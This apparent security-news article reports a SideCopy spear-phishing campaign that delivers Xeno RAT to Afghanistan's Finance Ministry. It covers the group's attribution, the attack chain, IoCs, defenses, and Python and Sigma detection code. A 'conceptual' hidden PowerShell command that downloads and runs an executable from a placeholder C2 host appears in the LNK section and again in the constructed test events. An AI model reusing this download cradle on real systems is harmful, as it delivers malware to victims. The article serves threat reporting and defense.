Pakistan-Linked SideCopy APT Targets Afghanistan Finance Ministry with Xeno RAT

Researchers have uncovered a spear-phishing campaign by the Pakistan-aligned SideCopy APT group targeting Afghanistan's Ministry of Finance with the open-source Xeno RAT remote access trojan delivered via malicious ZIP archives.

Dylan H.

News Desk

June 2, 2026
6 min read

Cybersecurity researchers have disclosed a spear-phishing campaign attributed with high confidence to the SideCopy threat group — a Pakistan-aligned advanced persistent threat (APT) actor — targeting Afghanistan's Ministry of Finance. The campaign delivers the Xeno RAT, an open-source remote access trojan, via a ZIP archive distributed through targeted phishing emails.

The research was published on June 2, 2026, by The Hacker News, and represents the latest documented intrusion by SideCopy against South and Central Asian government targets.


Attribution: Who Is SideCopy?

SideCopy is a Pakistan-linked threat group first identified in 2019. It is believed to operate in support of Pakistani state intelligence objectives, with a consistent focus on targets in:

  • India — Indian defense, government, and military organizations
  • Afghanistan — Government ministries, financial institutions
  • Central Asia — Regional governmental entities

The group is named for its tactic of mimicking SideWinder, another South Asian APT, by copying its infection chains. SideCopy has demonstrated increasing operational sophistication over the years, incorporating commercial and open-source tools alongside custom malware.

| Attribute        | Details                                        |
|------------------|------------------------------------------------|
| Alias            | SideCopy, APT-SideCopy                         |
| Suspected Origin | Pakistan                                       |
| Primary Targets  | India, Afghanistan, Central Asia               |
| Focus Areas      | Government, defense, finance, intelligence     |
| Toolset          | Xeno RAT, CetaRAT, AllaKore RAT, custom loaders |
| First Observed   | 2019                                           |

Campaign Overview

Initial Delivery: Spear Phishing with ZIP Archive

The campaign begins with a spear-phishing email crafted to appear legitimate and relevant to Ministry of Finance personnel. The email contains a malicious ZIP archive as an attachment.

Attack Chain:
Spear-phishing email (Ministry of Finance theme)
  → ZIP attachment opened by target
    → Contents extracted: LNK shortcut or weaponized document
      → Loader executes, downloads Xeno RAT
        → Xeno RAT establishes C2 connection
          → Persistent access to Ministry systems

Payload: Xeno RAT

Xeno RAT is an open-source remote access trojan available on GitHub. While its open availability might suggest less-sophisticated actors, state-aligned groups frequently adopt open-source tools because:

  1. Attribution obfuscation — Open-source tooling is used by many actors, complicating attribution
  2. Rapid deployment — Mature, well-documented codebase reduces development time
  3. Feature completeness — Xeno RAT provides a comprehensive C2 capability set

Xeno RAT Capabilities:

| Capability             | Description                                              |
|------------------------|----------------------------------------------------------|
| Remote Shell           | Execute arbitrary commands on compromised host           |
| File Manager           | Browse, upload, download, and delete files               |
| Process Management     | View and terminate running processes                     |
| Keylogging             | Capture keystrokes for credential harvesting             |
| Screenshot Capture     | Visual monitoring of user activity                       |
| Webcam/Mic Access      | Covert surveillance capability                           |
| Persistence            | Registry run keys, scheduled tasks, startup entries      |
| Network Reconnaissance | Map connected network resources                          |
| Reverse Proxy          | Tunnel connections through the compromised host          |

Technical Analysis

ZIP-Based Delivery

ZIP archives remain a popular phishing delivery mechanism because:

  • Many email security gateways scan top-level attachments but may not perform deep inspection of nested archive contents
  • Recipients are conditioned to expect ZIP files for document delivery
  • Password-protected archives can bypass automated scanning entirely (though this campaign's archive protection status was not specified)

LNK Shortcut Technique

SideCopy has historically used Windows LNK (shortcut) files within archives as a delivery mechanism. When executed, the LNK file runs a hidden PowerShell or CMD command that:

  1. Displays a decoy document (e.g., an official-looking finance ministry PDF)
  2. Silently downloads and executes the Xeno RAT payload in the background
# Example LNK execution pattern (conceptual)
powershell.exe -WindowStyle Hidden -Command "
  Invoke-WebRequest -Uri 'http://c2.domain/xeno.exe' -OutFile $env:TEMP\svchost32.exe;
  Start-Process $env:TEMP\svchost32.exe"
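The two delivery traits above, a nested or executable-bearing ZIP and a shortcut disguised as a finance document, are things a mail gateway or triage script can check before a user ever extracts the archive. The following is an added example, not code from the original article or from any vendor product: a small inspector that walks a ZIP (recursing into nested ZIPs up to a depth limit), flags encrypted entries it cannot scan, LNK and other executable content, document-style double extensions such as `report.pdf.lnk`, and returns a block/review/allow verdict. The archive it analyzes is constructed in memory to resemble the described delivery; the file names and placeholder bytes are invented for the example and are not campaign artifacts.

```python
import io
import zipfile

# Extensions a ministry mailbox has no business receiving inside an archive (assumed policy list).
EXECUTABLE_EXT = {".lnk", ".exe", ".scr", ".hta", ".js", ".jse", ".vbs", ".bat", ".cmd", ".ps1", ".dll"}
DOCUMENT_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt"}
NESTED_ARCHIVE_EXT = {".zip"}          # only ZIP is unpacked here; other archive types would need their own reader
MAX_DEPTH = 3                          # stop recursing into archives nested deeper than this
MAX_ENTRY_BYTES = 50 * 1024 * 1024     # refuse to inflate oversized nested entries (zip-bomb guard)


def _basename_parts(name):
    """Lower-cased file name split on dots, e.g. 'a/b/Report.pdf.lnk' -> ['report', 'pdf', 'lnk']."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base.split(".")


def inspect_zip(data, prefix="", depth=0):
    """Return a list of (entry path, reason) findings for one archive and any ZIPs nested in it."""
    findings = []
    if depth > MAX_DEPTH:
        return [(prefix, "nesting depth exceeded")]
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [(prefix, "not a valid ZIP archive")]
    with zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            path = prefix + info.filename
            parts = _basename_parts(info.filename)
            ext = "." + parts[-1] if len(parts) > 1 else ""
            # Bit 0 of the general-purpose flag marks an encrypted entry; its content cannot be inspected.
            if info.flag_bits & 0x1:
                findings.append((path, "encrypted entry (content cannot be scanned)"))
                continue
            # 'Something.pdf.lnk': a document extension hiding in front of an executable one.
            if len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXT and ext in EXECUTABLE_EXT:
                findings.append((path, "document-style double extension"))
            if ext in EXECUTABLE_EXT:
                findings.append((path, f"executable or script content ({ext})"))
            if ext in NESTED_ARCHIVE_EXT:
                findings.append((path, "nested archive"))
                if info.file_size > MAX_ENTRY_BYTES:
                    findings.append((path, "nested archive too large to inflate"))
                else:
                    findings.extend(inspect_zip(zf.read(info), path + "!/", depth + 1))
    return findings


def verdict(findings):
    """Map findings to a gateway decision: block on unscannable or executable content, review anything else flagged."""
    reasons = {reason for _, reason in findings}
    if any(r.startswith(("executable", "document-style", "encrypted")) for r in reasons):
        return "block"
    return "review" if findings else "allow"


def build_sample_archive():
    """Constructed sample shaped like the described delivery (decoy PDF, LNK, nested ZIP with a binary); not a real artifact."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("loader.exe", b"MZ placeholder bytes, not an executable")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("Budget_Circular_2026.pdf", b"%PDF-1.4 constructed decoy document")
        z.writestr("Budget_Circular_2026.pdf.lnk", b"placeholder shortcut bytes")
        z.writestr("attachments/annex.zip", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    found = inspect_zip(build_sample_archive())
    for path, reason in found:
        print(f"{path}: {reason}")
    print("verdict:", verdict(found))
```

Run against the constructed archive, the inspector reports the double extension and LNK content of `Budget_Circular_2026.pdf.lnk`, the nested `attachments/annex.zip`, and the `loader.exe` inside it, and returns `block`. The encrypted-entry branch is what makes password-protected archives a review item rather than a silent pass: the gateway cannot see inside, so it should not pretend it did.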

C2 Infrastructure

SideCopy typically registers domains that mimic legitimate services or government entities of the target country. Infrastructure analysis often reveals:

  • Short-lived domains registered through privacy-protecting registrars
  • Hosting on VPS providers in countries with limited law enforcement cooperation
  • TLS certificates to blend with legitimate HTTPS traffic

Geopolitical Context

The targeting of Afghanistan's Ministry of Finance is consistent with Pakistani intelligence priorities following the 2021 Taliban takeover. Key intelligence interests include:

  • Financial flows and foreign aid distribution
  • Government decision-making affecting regional economic policy
  • Diplomatic communications between Kabul and international partners
  • Internal political dynamics and factional power structures

SideCopy's persistence against Afghan targets — continuing well after the Taliban government took power — suggests the group's tasking has adapted to collect intelligence on the new administration rather than ceasing operations.


Indicators of Compromise (IoCs)

Security teams should hunt for the following indicators (specific hashes and domains are subject to change as the actor rotates infrastructure):

Detection Rules (Conceptual YARA/Sigma)

# Sigma rule — Xeno RAT stage-1 process behavior (conceptual)
# Note: the process whose command line carries the download cradle is the PowerShell
# process itself, so the match is on Image, not ParentImage; requiring both the hidden
# window and the download keyword keeps 'Start-Process' alone from firing on every script.
title: Hidden PowerShell Download Cradle
status: experimental
description: Detects PowerShell started with a hidden window that downloads content, the stage-1 pattern used to fetch Xeno RAT
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\powershell.exe'
      - '\pwsh.exe'
  selection_cli:
    CommandLine|contains|all:
      - 'WindowStyle Hidden'
      - 'Invoke-WebRequest'
  condition: selection_img and selection_cli
falsepositives:
  - Administrative scripts that fetch installers with a hidden window
level: medium

Behavioral Indicators

| Indicator                                                    | Description                 |
|--------------------------------------------------------------|-----------------------------|
| LNK file execution from temp directory                       | LNK-based payload delivery  |
| PowerShell downloading executable from non-corporate domain  | Stage-1 dropper activity    |
| New process spawned from TEMP/AppData                        | Xeno RAT installation       |
| Scheduled task creation with base64-encoded command          | Persistence mechanism       |
| Outbound TCP to non-standard ports                           | Xeno RAT C2 beaconing       |
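To show how the Sigma rule above and three of the behavioral indicators in the table translate into detection logic, here is an added example (not code from the article, Sigma, or any EDR product) that evaluates process-creation events carrying Sysmon-style `Image`, `ParentImage`, and `CommandLine` fields. It implements three checks: a hidden-window PowerShell download cradle, an executable launched from a user-writable location such as `AppData\Local\Temp`, and a `schtasks.exe /Create` whose action is an encoded PowerShell command. The four sample events are constructed for the example; the `example.invalid` host, user name and file names are placeholders, not indicators from the campaign.

```python
import re
from dataclasses import dataclass

# Constructed sample events in Sysmon Event ID 1 / Sigma process_creation field names (not real telemetry).
SAMPLE_EVENTS = [
    {   # Shortcut launched from Explorer runs a hidden download cradle (constructed)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest -Uri http://example.invalid/x.exe -OutFile $env:TEMP\svchost32.exe; Start-Process $env:TEMP\svchost32.exe"',
    },
    {   # The downloaded binary starting from the user's temp directory (constructed)
        "Image": r"C:\Users\analyst\AppData\Local\Temp\svchost32.exe",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"C:\Users\analyst\AppData\Local\Temp\svchost32.exe",
    },
    {   # Persistence via a scheduled task whose action is an encoded PowerShell command (constructed)
        "Image": r"C:\Windows\System32\schtasks.exe",
        "ParentImage": r"C:\Users\analyst\AppData\Local\Temp\svchost32.exe",
        "CommandLine": r'schtasks.exe /Create /SC ONLOGON /TN Updater /TR "powershell -EncodedCommand SQBFAFgA"',
    },
    {   # Benign administrative script: visible window, no download keyword (constructed)
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1",
    },
]


@dataclass(frozen=True)
class Alert:
    rule: str
    image: str


def _ends_with_any(value, suffixes):
    """Case-insensitive equivalent of Sigma's 'endswith' over a list (OR)."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_all(value, needles):
    """Case-insensitive equivalent of Sigma's 'contains|all' (AND)."""
    v = value.lower()
    return all(n.lower() in v for n in needles)


def _contains_any(value, needles):
    """Case-insensitive equivalent of Sigma's 'contains' over a list (OR)."""
    v = value.lower()
    return any(n.lower() in v for n in needles)


def rule_hidden_download_cradle(ev):
    """PowerShell itself (Image, not ParentImage) with a hidden window and a download primitive."""
    return (_ends_with_any(ev["Image"], [r"\powershell.exe", r"\pwsh.exe"])
            and _contains_all(ev["CommandLine"], ["windowstyle hidden"])
            and _contains_any(ev["CommandLine"], ["invoke-webrequest", "downloadfile", "downloadstring", "iwr "]))


# Directories an ordinary user can write to; a signed corporate installer rarely runs from here.
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|AppData\\Roaming|Downloads|Desktop)\\", re.IGNORECASE)


def rule_exec_from_user_writable(ev):
    """An .exe image located under a user-writable path (the 'new process from TEMP/AppData' indicator)."""
    return ev["Image"].lower().endswith(".exe") and USER_WRITABLE.search(ev["Image"]) is not None


# -e, -ec, -enc and -EncodedCommand are the accepted spellings of PowerShell's encoded-command switch.
ENCODED_SWITCH = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.IGNORECASE)


def rule_schtasks_encoded(ev):
    """schtasks.exe creating a task whose action carries an encoded PowerShell command."""
    return (_ends_with_any(ev["Image"], [r"\schtasks.exe"])
            and _contains_all(ev["CommandLine"], ["/create"])
            and ENCODED_SWITCH.search(ev["CommandLine"]) is not None)


RULES = {
    "hidden_powershell_download_cradle": rule_hidden_download_cradle,
    "executable_from_user_writable_path": rule_exec_from_user_writable,
    "scheduled_task_with_encoded_command": rule_schtasks_encoded,
}


def evaluate(events):
    """Run every rule over every event and return the alerts raised, in event order."""
    alerts = []
    for ev in events:
        for name, check in RULES.items():
            if check(ev):
                alerts.append(Alert(name, ev["Image"]))
    return alerts


if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(f"{alert.rule}: {alert.image}")
```

The first three constructed events each raise exactly one alert and the benign script raises none, which is the behavior the rule's `contains|all` condition is meant to produce: hidden-window downloads fire, a visible `-File` invocation does not. Matching on `Image` rather than `ParentImage` matters because the command line that contains the cradle belongs to the PowerShell process itself; a rule keyed on the parent would only ever see the command line of whatever PowerShell launched next.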

Recommended Defenses

Email Security

  1. Block password-protected archives from external senders or require manual review
  2. Enable sandboxed attachment detonation (e.g., Defender for Office 365 ATP, Proofpoint TAP) to dynamically analyze ZIP contents
  3. Implement SPF, DKIM, DMARC to reduce spoofed sender addresses mimicking government domains

Endpoint Protection

  1. Block LNK execution from user-writable directories (Downloads, Desktop, Temp):

    Attack Surface Reduction Rule:
    Block all Office applications from creating child processes
    Block JavaScript or VBScript from launching downloaded executable content
    
  2. Enable PowerShell ScriptBlock logging to detect obfuscated download cradles:

    # Enable ScriptBlock logging (Group Policy or registry); the policy key is absent by default, so create it first
    $key = "HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging"
    New-Item -Path $key -Force | Out-Null
    Set-ItemProperty -Path $key -Name "EnableScriptBlockLogging" -Value 1 -Type DWord
  3. Restrict PowerShell execution policy to AllSigned or RemoteSigned for non-administrators

Network Monitoring

  • Alert on new outbound connections to recently registered domains (< 30 days old)
  • Monitor for unusual data volumes from workstations connecting to non-corporate cloud infrastructure
  • Use DNS-layer security (Cisco Umbrella, Cloudflare Gateway) to block newly observed malicious domains

Key Takeaways

  1. SideCopy (Pakistan-aligned APT) is conducting a targeted spear-phishing campaign against Afghanistan's Ministry of Finance
  2. The campaign delivers Xeno RAT — a full-featured open-source RAT — via malicious ZIP archives, enabling persistent remote access and intelligence collection
  3. Government and financial organizations in South and Central Asia should heighten phishing defenses and monitor for Xeno RAT behavioral indicators
  4. The choice of open-source tooling complicates attribution — defensive teams should rely on behavioral TTPs rather than malware signatures alone
  5. This campaign reflects ongoing Pakistani intelligence interest in monitoring Afghan government operations

Sources

  • The Hacker News — Pakistan-Linked SideCopy Targets Afghanistan Finance Ministry with Xeno RAT
  • MITRE ATT&CK — SideCopy Group Profile
  • Xeno RAT GitHub Repository
Tags: #APT #SideCopy #Pakistan #Afghanistan #XenoRAT #SpearPhishing #StateSponsored #TheHackerNews
